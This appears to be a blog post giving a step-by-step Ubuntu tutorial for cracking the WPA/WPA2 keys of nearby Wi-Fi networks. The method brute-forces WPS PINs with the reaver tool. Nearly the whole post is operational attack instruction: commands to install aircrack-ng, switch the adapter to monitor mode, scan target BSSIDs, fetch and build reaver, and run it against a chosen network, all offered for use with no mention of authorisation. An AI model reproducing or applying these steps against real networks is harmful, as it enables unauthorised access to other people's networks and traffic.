The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker bruteforce against Wifi Protected Setup (WPS) PINS in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!
Using the terminal:

1. Download aircrack-ng:

sudo apt-get install aircrack-ng

2. Put Wifi adapter into monitor mode:

sudo airmon-ng start wlan0

3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:

sudo airodump-ng mon0

 4. <crtl+c> after a few seconds or once a list of BSSIDs has populated, it should look like this:



The BSSIDs are listed on the left, these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK).

Don't close this terminal, open up a new terminal and use this now instead. 

READ STEPS 5-8 OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:

sudo apt-get install libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install

sudo apt-get install libsqlite3-dev

 6. Download reaver:

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

7. Extract reaver tar.gz file:

tar xfvz reaver-1.4.tar.gz

8. Install reaver:

cd reaver-1.4/src/ && ./configure && make && sudo make install

9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it in like this:

sudo reaver -i mon0 -b <paste BSSID here!!> -vv

10. Now wait from around 4-10 hours as it cracks the network key!


Do you have questions, comments, or suggestions? Feel free to post a comment! 

Liked this post?
Subscribe to "Saint Andrew's Paradise" and get all new tricks, tools and regular updates to your inbox!